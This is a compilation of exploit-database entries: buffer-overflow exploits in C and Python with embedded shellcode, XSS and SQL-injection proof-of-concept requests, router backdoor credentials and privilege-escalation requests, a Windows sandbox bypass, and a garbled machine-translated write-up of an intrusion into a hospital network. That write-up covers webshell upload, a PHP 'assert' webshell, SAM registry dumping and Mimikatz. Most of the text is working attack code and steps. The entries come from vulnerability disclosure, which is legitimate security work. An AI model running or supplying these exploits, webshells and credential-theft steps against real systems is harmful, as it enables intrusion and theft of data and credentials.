Accept-Encoding: gzip, deflate Referer: http://192.168.1.1/updatesettings.html Cookie: dm_install=no; dm_enable=no; hwaddr=54:A0:50:E4:F5:C0 Connection: keep-alive Content-Type: multipart/form-data; boundary=--------------------------- 75010019812050198961998600862 Authorization: Basic (Base 64 Encoded:<USER:PASSWORD>) Content-Length: 88438 -----------------------------75010019812050198961998600862 Content-Disposition: form-data; name="filename"; filename="backupsettings.conf" Content-Type: config/conf <?xml version="1.0"?> <DslCpeConfig version="3.2"> ... <AdminPassword>dnFmMUJyM3oB</AdminPassword> ... --- Configuration File Contents --- </DslCpeConfig> Fix Information: ---------------- Upgrade to version S3.1.241 Timeline: --------- 2014/10: Issues No. (1 & 2) reported to Zhone 2014/12: Issues No. (1 & 3) reported to Zhone 2015/01: Requested Update 2015/01: Fixes Provided by Zhone, but vulnerabilities still not fixed 2015/02: Sent P.O.C Video to show how vulnerabilities work 2015/03: Fixes Provided by Zhone, but vulnerabilities still not fixed 2015/04: Requested Update 2015/04: Issues No. (4 & 5) reported to Zhone 2015/06: Requested Update 2015/08: Requested Update 2015/09: Fixes for issue 1, 4 and 5 completed by Zhone 2015/10: Confirm that all issues has been fixed About Vantage Point Security: -------------------- Vantage Point is the leading provider for penetration testing and security advisory services in Singapore. Clients in the Financial, Banking and Telecommunications industries select Vantage Point Security based on technical competency and a proven track record to deliver significant and measurable improvements in their security posture. https://www.vantagepoint.sg/ office[at]vantagepoint[dot]sg

/* ASX to MP3 Converter SOF - Ivan Ivanovic Ivanov Иван-дурак недействительный 31337 Team holahola ~ https://www.exploit-db.com/exploits/38382/ Winblows 2k3 */ #include <stdio.h> #include <windows.h> #include <malloc.h> int main() { int i; char *overwrite_offset = malloc(255); for(i = 0; i < 255; i += 5) { char padding[] = "\x41\x41\x41\x41\x41"; memcpy(overwrite_offset + i, padding, strlen(padding)); } memset(overwrite_offset + _msize(overwrite_offset) - 1, 0x00, 1); char retn[] = "\x92\x72\x23\x74"; char shellcode[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" // NOP sled "\xdb\xc8\xd9\x74\x24\xf4\xbd\xaf\x93\x43\xb4\x5e\x31\xc9\xb1" "\x52\x31\x6e\x17\x83\xee\xfc\x03\xc1\x80\xa1\x41\xe1\x4f\xa7" "\xaa\x19\x90\xc8\x23\xfc\xa1\xc8\x50\x75\x91\xf8\x13\xdb\x1e" "\x72\x71\xcf\x95\xf6\x5e\xe0\x1e\xbc\xb8\xcf\x9f\xed\xf9\x4e" "\x1c\xec\x2d\xb0\x1d\x3f\x20\xb1\x5a\x22\xc9\xe3\x33\x28\x7c" "\x13\x37\x64\xbd\x98\x0b\x68\xc5\x7d\xdb\x8b\xe4\xd0\x57\xd2" "\x26\xd3\xb4\x6e\x6f\xcb\xd9\x4b\x39\x60\x29\x27\xb8\xa0\x63" "\xc8\x17\x8d\x4b\x3b\x69\xca\x6c\xa4\x1c\x22\x8f\x59\x27\xf1" "\xed\x85\xa2\xe1\x56\x4d\x14\xcd\x67\x82\xc3\x86\x64\x6f\x87" "\xc0\x68\x6e\x44\x7b\x94\xfb\x6b\xab\x1c\xbf\x4f\x6f\x44\x1b" "\xf1\x36\x20\xca\x0e\x28\x8b\xb3\xaa\x23\x26\xa7\xc6\x6e\x2f" "\x04\xeb\x90\xaf\x02\x7c\xe3\x9d\x8d\xd6\x6b\xae\x46\xf1\x6c" "\xd1\x7c\x45\xe2\x2c\x7f\xb6\x2b\xeb\x2b\xe6\x43\xda\x53\x6d" "\x93\xe3\x81\x22\xc3\x4b\x7a\x83\xb3\x2b\x2a\x6b\xd9\xa3\x15" "\x8b\xe2\x69\x3e\x26\x19\xfa\xed\xa7\x55\x71\x85\xc5\x95\x84" "\xed\x43\x73\xec\x01\x02\x2c\x99\xb8\x0f\xa6\x38\x44\x9a\xc3" "\x7b\xce\x29\x34\x35\x27\x47\x26\xa2\xc7\x12\x14\x65\xd7\x88" "\x30\xe9\x4a\x57\xc0\x64\x77\xc0\x97\x21\x49\x19\x7d\xdc\xf0" "\xb3\x63\x1d\x64\xfb\x27\xfa\x55\x02\xa6\x8f\xe2\x20\xb8\x49" "\xea\x6c\xec\x05\xbd\x3a\x5a\xe0\x17\x8d\x34\xba\xc4\x47\xd0" "\x3b\x27\x58\xa6\x43\x62\x2e\x46\xf5\xdb\x77\x79\x3a\x8c\x7f" "\x02\x26\x2c\x7f\xd9\xe2\x5c\xca\x43\x42\xf5\x93\x16\xd6\x98" "\x23\xcd\x15\xa5\xa7\xe7\xe5\x52\xb7\x82\xe0\x1f\x7f\x7f\x99" "\x30\xea\x7f\x0e\x30\x3f"; int buffer_size = _msize(overwrite_offset) + strlen(retn) + strlen(shellcode); char *buffer = malloc(buffer_size); memcpy(buffer, overwrite_offset, _msize(overwrite_offset)); memcpy(buffer + _msize(overwrite_offset), retn, strlen(retn)); memcpy(buffer + _msize(overwrite_offset) + strlen(retn), shellcode, strlen(shellcode)); memset(buffer + buffer_size - 1, 0x00, 1); FILE * fp; fp = fopen("exploit.asx","w"); fprintf(fp, buffer); fclose(fp); return 0; }

# Exploit Title: Boxoft WAV to MP3 Converter 1.1 - SEH Buffer Overflow # Date: 10/13/2015 # Exploit Author: ArminCyber # Contact: Armin.Exploit@gmail.com # Version: 1.1 # Tested on: XP SP3 EN # Description: A malicious .aiff file cause this vulnerability. # category: Local Exploit f = open("malicious.aiff", "w") f.write("A"*4132) f.write("\xeb\x06\x90\x90") f.write("\xa4\x43\x40\x00") # Shelcode: # windows/exec - 277 bytes # CMD=calc.exe f.write("\x90"*20) f.write("\xba\xd5\x31\x08\x38\xdb\xcb\xd9\x74\x24\xf4\x5b\x29\xc9\xb1" "\x33\x83\xc3\x04\x31\x53\x0e\x03\x86\x3f\xea\xcd\xd4\xa8\x63" "\x2d\x24\x29\x14\xa7\xc1\x18\x06\xd3\x82\x09\x96\x97\xc6\xa1" "\x5d\xf5\xf2\x32\x13\xd2\xf5\xf3\x9e\x04\x38\x03\x2f\x89\x96" "\xc7\x31\x75\xe4\x1b\x92\x44\x27\x6e\xd3\x81\x55\x81\x81\x5a" "\x12\x30\x36\xee\x66\x89\x37\x20\xed\xb1\x4f\x45\x31\x45\xfa" "\x44\x61\xf6\x71\x0e\x99\x7c\xdd\xaf\x98\x51\x3d\x93\xd3\xde" "\xf6\x67\xe2\x36\xc7\x88\xd5\x76\x84\xb6\xda\x7a\xd4\xff\xdc" "\x64\xa3\x0b\x1f\x18\xb4\xcf\x62\xc6\x31\xd2\xc4\x8d\xe2\x36" "\xf5\x42\x74\xbc\xf9\x2f\xf2\x9a\x1d\xb1\xd7\x90\x19\x3a\xd6" "\x76\xa8\x78\xfd\x52\xf1\xdb\x9c\xc3\x5f\x8d\xa1\x14\x07\x72" "\x04\x5e\xa5\x67\x3e\x3d\xa3\x76\xb2\x3b\x8a\x79\xcc\x43\xbc" "\x11\xfd\xc8\x53\x65\x02\x1b\x10\x99\x48\x06\x30\x32\x15\xd2" "\x01\x5f\xa6\x08\x45\x66\x25\xb9\x35\x9d\x35\xc8\x30\xd9\xf1" "\x20\x48\x72\x94\x46\xff\x73\xbd\x24\x9e\xe7\x5d\x85\x05\x80" "\xc4\xd9") f.write("\x90"*20) f.close()

source: https://www.securityfocus.com/bid/59030/info jPlayer is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com/Jplayer.swf?id=%3Cimg%20src=x%20onerror=alert\u0028\u0027moin\u0027\u0029%3E&jQuery=document.write

source: https://www.securityfocus.com/bid/59022/info Request Tracker is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. RT 4.0.10 is vulnerable; other versions may also be affected. POST /Approvals/ HTTP/1.0 Content-Type: application/x-www-form-urlencoded Cookie: RT_SID_example.com.80=7c120854a0726239b379557f024cc1cb Accept-Language: en-US Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.example.com/Approvals/ Host: 10.10.10.70 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Length: 120 ShowPending=1%27+and+%27f%27%3D%27f%27%29+--+&ShowResolved=1&ShowRejected=1&ShowDependent=1&CreatedBefore=&CreatedAfter=

source: https://www.securityfocus.com/bid/59041/info Hero is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Hero 3.791 is vulnerable; other versions may also be affected. http://www.example.com/users/login?username=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

source: https://www.securityfocus.com/bid/59021/info Spider Video Player plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Spider Video Player 2.1 is vulnerable; other versions may also be affected. http://www.example.com/wp-content/plugins/player/settings.php?playlist=[num]&theme=[SQL]

0x00情報収集 は、ターゲット名（一部の病院）と1つのIPのみが1つの緊急テストタスクを受けました。 まず、Goby Shuttleを使用して、取得したIPをフルポートでスキャンします。 サービスには、Weblogic、JBoss、Springboot、Struts2、およびその他のさまざまなシステムが含まれます（単純な練習範囲です） 0x01外部ネットワーク浸透 それらの中で、彼らはjexbossを使用して、ウェブロジックの他のcve脆弱性を脱上化し、脱また重化しようとしました。 ただし、ポート8282の臨床スキルセンター管理プラットフォームで弱いパスワードが見つかりました （管理者/管理者）は、バックグラウンドに正常にログインできます。 テスト後、ターゲット辞書管理下の画面情報管理システムの設定は、写真にファイルのアップロードが存在することを示しています。 JSPをPNGサフィックスですぐにアップロードし、Burpsuiteを使用してパケットを直接キャプチャし、JSPサフィックスに変更します。 アップロード後、ターゲットURLとWebShellにアクセスしますが、Godzillaを使用して直接接続すると失敗します。 Master Humがリンク時に現在のページのCookieが必要であることを発見した後（ターゲットはURLをジャンプさせました。ログインしていない場合、ログインページに戻ります。） このようにして、WebShellのURLに正常にアクセスすることはできません。 Webシェルは通常、Cookieで接続できます（Cookieの有効期限が切れた後、WebShellが低下します）。 接続が成功した後、Webシェルを安定させるために、staticファイルのルートディレクトリとディレクトリにWebシェルを書き込もうとしますが、強制ジャンプの影響を受けます。 そのため、WebShellコンテンツは、ログインする前にシェルを安定させる前にアクセスできる通常のJSPファイルに書き込まれます。 0x02イントラネット浸透 その後、ターゲットが収集されました。ポータルWebサーバーはLinuxホストであり、大きなファイルをアップロードできません。 Webパスへの強制的なジャンプがあり、IPは172.20.10.49です 最初に、Neo-Regeorgを試して、WebサイトのルートディレクトリにWebシェルを書き、Cookieをプロキシに持ち込みましたが、失敗しました（その理由は、Webサイトの強制的なジャンプの問題である可能性があると思います） その後、Pystinger（Stinger）をお試しください。サーバーとウェブシェルをターゲットマシンにアップロードした後、私はそれを正常に実行できないことがわかりました（プログラムはエラーを報告し、コードが間違っているように見えました） そこで私は再びNeo-Regeorgに戻りましたが、今回はターゲットWebサイトの通常のJSPページをNeo-Regeorg Tunnel.jspコンテンツに置き換えようとしました。 ターゲットには強制的なジャンプがないことがわかりました（ターゲットはファイル名に基づいて強制的なジャンプであり、ホワイトリストに登録されていると推測されました）、接続はローカルで試みられ、プロキシは正常でした（エラーは影響を与えることなく報告されました）。 ラドンを使用して、フォワードプロキシを介してイントラネットをスキャンしてみてください（コマンドはwadon.exe 172.20.10.1/24 webscan）、スキャンの結果は次のとおりです。 ターゲットにはphpstudyプローブページがあり、プローブページにはmysqlの弱いパスワードルートがあることがわかります。 ディレクトリをスキャンして、このIPの下にphpmyAdminページもあることがわかりました。ルートとルートを使用してログインできます。 テスト後、データベースユーザーはOutfileのエクスポート権限を持っていませんが、ログのgetShellを渡すことができます Webサイトのルートディレクトリでgeneral_log_fileを222.phpに変更する execute select？php phpinfo（）; assert（$ _ post ['cmd']）;逃げるために ステーションのホストはWindowsホスト、システム許可であることがわかりましたが、それでもネットワークを離れていません。 プロセスを確認し、タスクリストを使用してソフトキリングプロセスを比較し、ターゲットホストにKasperskyがあることがわかります（プロセスはAVP.Exeです） Cobaltzirs0Nマスターは、Shadow Copyメソッドを使用してターゲットシステム、セキュリティ、およびSAMファイルを取得しようとしましたが、局所的にオフラインで復号化されますが、WMIC Shadowcopy Call Create Volume='C:'コマンドを実行した後、VSSADMINリストシャドウを使用するとエラーが発生しました。 システムの許可であるため、PowerShellを使用してファイルを直接エクスポートしてみてください RegSaveHKLMSYSTEMSTEMSYSTEMSEGREGRMSCURITYSECURTYREG SAVE HKLMSAM SAM Mimikatzを使用してハッシュを正常に復号化します（パスワードをデコードできません） 現時点でリモートデスクトップにログインする3つの方法があります 1.アカウントを直接追加する（Kasperskyはインターセプトしない） この時点で、管理者はイントラネットの動きを発見し、サイトのバックハンドを直接閉じたはずです。 0x03浸透概要 1。ターゲットIPをGobyを介してスキャンして、WeblogCig、JBOS、Springboot、Strust2のミドルウェアコンポーネントがあることを発見しました。臨床スキルセンター管理プラットフォーム。背景を入力すると、画像のアップロード場所がアップロードされていることがわかりました。ファイルのアップロードがあります。これがJSPファイルで、Godzillaを介して接続します。接続が失敗することを促します。接続する前にGodzillaの要求構成にCookie値を追加する必要があります（Webサイトはログインしていないシステムをセットアップします。Webサイトページにアクセスすると、ログインページにジャンプすることができます）したがって、Webサイトのページのコンテンツはtunnel.jspのコンテンツに置き換えられます。これは通常5にアクセスできます。ここでは、Regeorg+proxifierがここで使用されます。ローカルソックスプロキシを実行します。ローカルプロキシは、ターゲットシステムがdon.exe 172.20.10.1/24 Webscanを介して配置されているイントラネットセグメントをスキャンし、172.20.10.49にphpstudyプローブページがあることを発見しました。ローカルプロキシは、Chrome.exeから172.20.10.49ページにアクセスします。ページのMySQLサービスには、ルート/ルートのパスワードが弱いです。 6。同時に、ローカルエージェントはDirsearchを通じて172.20.10.49のディレクトリをスキャンし、phpmyadminページがあることを発見します。ローカルエージェントは、Chrome.exeを介して172.20.10.49/phpymadinにアクセスし、弱いパスワードルート/ルートを介して入ります。 Webサイトの絶対パスは、「％general％」などのショー変数を介して見つかり、WebShellSelect？php phpinfo（）を書き込みます。 assert（$ _ post ['cmd']）;into Outfile 'e:/phpstudy/www/shell.php'; getShell8。ローカルエージェントは、Ajian 172.20.10.49/shell.phpを介してリンクします。タスクリストを実行して、Akaspersky（AVP.Exe）がシステムに存在することを確認します。 whoamiはシステム許可であることを尋ねる9。コマンドWMICシャドウコピーコールCREATEボリューム='C:'を実行しようとした後、vSSADMINリストシャドウを使用してクエリを使用するとエラーが発生し、登録クラス10がないことを促します。 e:/phpstudy/www/systempowershell reg save hklm \ secrrity e:/phpstudy/www/securitypowershell reg save hklm \\ sam e:/phpstudy/www/sam11。 Mimikatzを試して、ハッシュ値Mimiatz＃LSADUM:3360SAM /SAM:SAM.HIV /SYSTEM:SERTAM.HIVをうまく復号化してください 転載：ファイトタイガースチーム

source: https://www.securityfocus.com/bid/59041/info Hero is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Hero 3.791 is vulnerable; other versions may also be affected. http://www.example.com/users/forgot_password?error=PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==

source: https://www.securityfocus.com/bid/59053/info Aibolit is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks. http://www.example.com/AI-BOLIT-REPORT-<date>-< time>.html

source: https://www.securityfocus.com/bid/59054/info Cisco Linksys EA2700 routers is prone to the following security vulnerabilities: 1. A security-bypass vulnerability 2. A cross-site request-forgery vulnerability 3. A cross-site scripting vulnerability An attacker can exploit these issues to bypass certain security restrictions, steal cookie-based authentication credentials, gain access to system and other configuration files, or perform unauthorized actions in the context of a user session. Cisco Linksys EA2700 running firmware 1.0.12.128947 is vulnerable. The following example request is available: POST /apply.cgi HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 47 submit_button=xss'%3balert(1)//934&action=Apply

source: https://www.securityfocus.com/bid/59055/info The Linux kernel is prone to multiple local denial-of-service vulnerabilities. Attackers can exploit these issues to trigger a kernel crash, which may result in a denial-of-service condition. cd /sys/kernel/debug/tracing echo 1234 | sudo tee -a set_ftrace_pid

# Exploit Title: [netis RealTek wireless router / ADSL modem Multiple Vulnerabilities] # Discovered by: Karn Ganeshen # Reported on: [October 13, 2015] # Vendor Response: [Vulnerability? What's this?] # Vendor Homepage: [www.netis-systems.com] # Version Affected: [Firmware version RTK v2.1.1] **Vulnerability Details** * 1. Default, weak passwords for http and ftp services * a. *HTTP accounts* - guest/guest - user/user - guest/XXXXairocon <chain N="USERNAME_PASSWORD"> <V N="FLAG" V="0x0"/> <V N="USERNAME" V="guest"/> <V N="PASSWORD" V="guest"/> <V N="BACKDOOR" V="0x0"/> <V N="PRIORITY" V="0x2"/> </chain> <chain N="USERNAME_PASSWORD"> <V N="FLAG" V="0x0"/> <V N="USERNAME" V="user"/> <V N="PASSWORD" V="user"/> <V N="BACKDOOR" V="0x0"/> <V N="PRIORITY" V="0x0"/> </chain> <chain N="USERNAME_PASSWORD"> <V N="FLAG" V="0x0"/> <V N="USERNAME" V="guest"/> <V N="PASSWORD" V="XXXXairocon"/> <V N="BACKDOOR" V="0x1"/> <V N="PRIORITY" V="0x1"/> </chain> *XXXX -> last four digits of MAC address * b. *FTP accounts* - admin/admin - useradmin/useradmin - user/user <chain N="FTP_SERVER"> <V N="ENABLE" V="0x1"/> <V N="USERNAME" V="admin"/> <V N="PASSWORD" V="admin"/> <V N="PORT" V="0x15"/> <V N="USERRIGHT" V="0x3"/> <V N="INSTNUM" V="0x1"/> </chain> <chain N="FTP_SERVER"> <V N="ENABLE" V="0x1"/> <V N="USERNAME" V="useradmin"/> <V N="PASSWORD" V="useradmin"/> <V N="PORT" V="0x15"/> <V N="USERRIGHT" V="0x2"/> <V N="INSTNUM" V="0x2"/> </chain> <chain N="FTP_SERVER"> <V N="ENABLE" V="0x1"/> <V N="USERNAME" V="user"/> <V N="PASSWORD" V="user"/> <V N="PORT" V="0x15"/> <V N="USERRIGHT" V="0x1"/> <V N="INSTNUM" V="0x3"/> </chain> 2. *Backdoor accounts* The device comes configured with privileged, backdoor account. For HTTP, 'guest' with attribute <V N="BACKDOOR" V="0x1"/>, is the backdoor account. This is seen in the config file: <chain N="USERNAME_PASSWORD"> <V N="FLAG" V="0x0"/> <V N="USERNAME" V="guest"/> <V N="PASSWORD" V="XXXXairocon"/> <V N="BACKDOOR" V="0x1"/> <V N="PRIORITY" V="0x1"/> </chain> This user is not shown / visible in the user list when logged in as guest (privileged user). 3. *No CSRF protection* There is no CSRF token set in any of the forms / pages. It is possible to silently execute HTTP requests if the user is logged in. 4. *Weak RBAC controls * 5a) *A non-root/non-admin user (user) can create and delete any other users, including root-privileged accounts. * In netis RealTek wireless router ADSL modem, there are three users: guest:guest -> priv 2 is super user account with full functional access user:user -> priv 0 -> can access only some functions guest:XXXXairocon -> privileged backdoor login *Normally: * - user can create new account with restricted user privs only. - user can change its password and only other non-root users. - user can delete any other non-root users. However, the application does not enforce strict rbac and it is possible for a non-root user to create a new user with root privileges. This is done as follows: 1. Start creating a new user, and intercepting the user creation POST request 2. Intercept & Change privilege parameter value from 0 (user) to 2 (root) - Submit request 3. When the new root user is created successfully, it does not show up in user list 4. Confirm via logging in as new root, and / or configured accounts in configuration file (config.img) This is the POST request to create a new user: *Create user http request*: POST /form2userconfig.cgi HTTP/1.1 Host: <IP> User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://<IP>/userconfig.htm?v= Cookie: SessionID= Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 115 username=test&privilege=2&newpass=test&confpass=test&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm= *Note1*: In some cases, this password change function is not accessible to 'user' via GUI. But we can still send a POST request to create a valid, new root privileged account. *Note2*: In some cases, application does not create root priv user, in the first attempt. However, in the 2nd or 3rd attempt, new user is created without any issue. *Delete user http request:* A non-root/non-admin user can delete any configured user(s) including privileged users (guest). POST /form2userconfig.cgi HTTP/1.1 Host: <ip> User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://<IP>/userconfig.htm Cookie: SessionID= Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 131 username=test&privilege=2&oldpass=&newpass=&confpass=&deluser=Delete&select=s3&hiddenpass=test&submit.htm% In case (non-root) user is deleting a root login (guest, priv 2), action status can be confirmed by checking the configuration In case (non-root) user is deleting a user login (priv 0), action status can be confirmed by checking the user list. 5b) *(non-root priv) User can access unauthorized functions.* Normally, 'user' does not have access to all the functionality of the device. It has access to Status, Setup and Maintenance. However, few functions can still be accessed by calling them directly. For example, to access the mac filtering configuration this url can be opened directly: http://<IP>/fw-macfilter.htm Other functions may also be accessible in this manner. 6. *Sensitive information not secured from low privileged users * A non-root / non-admin privileged user has access to download the configuration file - config.img. This file contains clear-text passwords, keys and other sensitive information which can be used to gain privileged access. 7. *Sensitive information accessible in clear-text* Sensitive Information like passwords and keys are not secured properly. Mostly these are either shown in clear-text or cen censored *****, it is possible to view clear-text values by 'Inspect Element' locally or intercepting http requests, or sniffing. -- Best Regards, Karn Ganeshen

''' [+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-ADOBE-WRKGRP-BUFFER-OVERFLOW.txt Vendor: ================================ www.adobe.com Product: ================================= AdobeWorkgroupHelper.exe v2.8.3.3 Part of Photoshop 7.0 circa 2002 Vulnerability Type: =========================== Stack Based Buffer Overflow CVE Reference: ============== N/A Vulnerability Details: ===================== AdobeWorkgroupHelper.exe is a component of the Photoshop 7 workgroup functionality, that lets users work with files on a server that is registered as a workgroup. If AdobeWorkgroupHelper.exe is called with an overly long command line argument it is vulnerable to a stack based buffer overflow exploit. Resluting in arbitrary code execution undermining the integrity of the program. We can control EIP register at about 5,856 bytes, our shellcode will point to ECX register. Tested successfully on Windows 7 SP1 Exploit code(s): =============== Use below python script to exploit... ''' import struct,os,subprocess #Photoshop 7 AdobeWorkgroupHelper.exe buffer overflow exploit #Tested Windows 7 SP1 #------------------------------------ #by hyp3rlinx - apparitionsec@gmail.com #hyp3rlinx.altervista.org #============================================================== # #0x618b19f7 : call ecx | {PAGE_EXECUTE_READ} [ARM.dll] #ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.8.3.3 #(C:\Program Files (x86)\Common Files\Adobe\Workflow\ARM.dll) #=============================================================== ''' Quick Register dump... EAX 00270938 ECX 00270A7C <---------------BOOM! EDX 00A515FC ASCII "AAAAAA..." EBX 41414140 ESP 0018FEB0 EBP 0018FED0 ESI 00000000 EDI 41414141 EIP 004585C8 AdobeWor.004585C8 C 0 ES 002B 32bit 0(FFFFFFFF) P 0 CS 0023 32bit 0(FFFFFFFF) A 0 SS 002B 32bit 0(FFFFFFFF) Z 0 DS 002B 32bit 0(FFFFFFFF) S 0 FS 0053 32bit 7EFDD000(FFF) T 0 GS 002B 32bit 0(FFFFFFFF) D 0 O 0 LastErr ERROR_SUCCESS (00000000) EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G) ''' #shellcode to pop calc.exe Windows 7 SP1 sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B" "\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B" "\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31" "\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA" "\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14" "\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65" "\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC") vulnpgm="C:\Program Files (x86)\Common Files\Adobe\Workflow\AdobeWorkgroupHelper.exe " #payload="A"*5852+"R"*4 #<---- control EIP register #our shellcode will point at ECX register, so we need to find an JMP or CALL ECX and point EIP to that address #where our malicious code resides, we find it in ARM.dll eip=struct.pack('<L', 0x618B19F7) #CALL ECX ARM.dll v2.8.3.3 payload="A"*5852+eip+"\x90"*20+sc #<----- direct EIP overwrite BOOOOOM!!! subprocess.Popen([vulnpgm, payload], shell=False) ''' Disclosure Timeline: ========================================================= Vendor Notification: August 31, 2015 October 12, 2015 : Public Disclosure Exploitation Technique: ======================= Local Severity Level: ========================================================= Med =========================================================== [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx '''

Source: https://code.google.com/p/google-security-research/issues/detail?id=486 Windows: Sandboxed Mount Reparse Point Creation Mitigation Bypass Platform: Windows 10 (build 10240), earlier versions do not have the functionality Class: Security Feature Bypass Summary: A mitigation added to Windows 10 to prevent NTFS Mount Reparse Points being created at integrity levels below medium can be bypassed. Description: Windows 10 has added some new mitigations to block the creation or change the behaviour of certain symbolic links when issued by a low integrity/sandboxed process. The presumed aim to to make it harder to abuse these types of tricks to break out of a sandbox. In earlier builds on Windows 10 NTFS Mount Reparse Points were blocked outright from a sandboxed process, however in 10240 (what can only be assumed a final build) the check was moved to the kernel in IopXXXControlFile and changed slightly so that sandboxed processes could create some mount points. The check is roughly: if (RtlIsSandboxedProcess()) { if(ControlCode == FSCTL_SET_MOUNT_POINT) { if (FsRtlValidateReparsePointBuffer(buffer) && buffer->ReparseTag == TAG_MOUNT_POINT) { NTSTATUS status = ZwOpenFile(..., buffer->ReparseTarget, FILE_GENERIC_WRITE, ... , FILE_DIRECTORY_FILE); if (!NT_SUCCESS(status)) { return status; } } } The kernel is therefore checking that the target of the mount point is a directory and that the current process has write access to the directory. This would sufficiently limit the ability of a sandboxed process to abuse this to write files at a higher privilege. Unfortunately there’s a perhaps unexpected problem with this check, the sandboxed process can redirect the ZwOpenFile call arbitrarily to something it can open for write, yet the original value is set as the mount point. This is because the file open check is being made inside the process which is doing the call which means it honours the user’s device mapping. While the sandboxed process cannot change the per-user drive mappings, it can change the process’s device map using NtSetInformationProcess with the ProcessDeviceMap information class. As we can create arbitrary object directories and symbolic links (which while they also have a mitigation it only prevents a higher privilege process following them, which we don’t care about) we can build a completely fake device map which redirects the open to another directory. A good target turns out to be \Device\NamedPipe\ (note the trailing slash) as that can be opened from any privilege level (including Chrome renderer processes) for write access and as a directory. So if we want to set an arbitrary mount point to say \??\c:\somewhere we can build something like: <UNNAMED>(DIR) -> C:(DIR) -> somewhere(LINK to \Device\NamedPipe\) If we set the unnamed directory to the process device map we can bypass the check and create the mount point. Perhaps from a fix perspective you could query for the opened path and use that to write to the NTFS reparse point rather than using the original value. Proof of Concept: I’ve provided a PoC which will demonstrate the bypass. It should be executed at low integrity using psexec or modifying the executable file’s ACL to low. Ensure you use the correct version for the architecture on Windows, as there seems to be a bug in NtSetInformationProcess which blocks Wow64 apps from setting the process device map. You can compare the operation to the command shell’s mklink tool that will fail to create the mount point at low integrity. The archive password is ‘password’. Follow these steps: 1) Extract the PoC to a location on a local hard disk which is writable by a normal user. 2) Execute the poc executable file as low integrity passing two arguments, the path to a directory to create (must be somewhere than can be written to as low integrity user such as AppData\Temp\Low) and the arbitrary file path to set the mount point to. For example: poc.exe c:\users\user\appdata\local\low\abc c:\notreal. Expected Result: It shouldn’t be possible to create a mount point pointed at a location not writable by low integrity user Observed Result: The mount point is created successfully. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38474.zip